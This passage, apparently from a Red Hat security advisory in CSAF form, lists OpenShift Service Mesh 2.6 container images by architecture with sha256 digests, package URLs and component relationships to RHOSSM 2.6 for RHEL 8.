"pkg:oci/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "s390x", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", relates_to_product_reference: 